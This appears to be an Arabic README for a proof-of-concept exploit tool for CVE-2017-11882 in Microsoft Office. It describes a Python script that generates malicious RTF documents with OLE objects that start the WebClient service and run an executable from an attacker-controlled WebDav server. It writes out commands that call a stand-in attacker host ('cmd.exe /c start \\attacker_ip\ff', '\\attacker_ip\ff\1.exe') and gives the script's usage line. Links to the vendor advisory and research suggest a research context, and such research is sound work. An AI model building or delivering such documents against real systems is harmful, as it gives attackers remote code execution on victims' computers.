
استغلال إثبات مفهوم لثغرة CVE-2017-11882 مع تنفيذ عن بُعد قائم على WebDav، يولّد مستندات RTF خبيثة لتنفيذ الأوامر عبر كائنات OLE.
CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882
MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882
بحث: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
تحليل التصحيح: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html
استغلال PoC تجريبي: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410
PoC بسيط لـ CVE-2017-11882. يستغل هذا الثغرة لبدء خدمة WebClient وتنفيذ ملف عن بعد من خادم WebDav يتحكم به المهاجم. السبب الذي يجعل هذا الأسلوب مفيدًا هو القيد على طول الأمر المنفذ. ومع ذلك، بمساعدة WebDav، من الممكن تشغيل أي ملف تنفيذي يتحكم به المهاجم على الجهاز الضعيف. يقوم هذا البرنامج النصي بإنشاء مستند بسيط يحتوي على عدة كائنات OLE. تستغل هذه الكائنات ثغرة CVE-2017-11882، مما يؤدي إلى تنفيذ أوامر متتالية.
قد يبدو الأمر الأول الذي يقوم بتشغيل خدمة WebClient كالتالي:
cmd.exe /c start \\attacker_ip\ff
يجب أن يكون مسار الملف التنفيذي الذي يتحكم به المهاجم مسار شبكة UNC:
\\attacker_ip\ff\1.exe
webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name
يحتوي مجلد example على ملف .rtf الذي يستغل ثغرة CVE-2017-11882 ويقوم بتشغيل الآلة الحاسبة في النظام.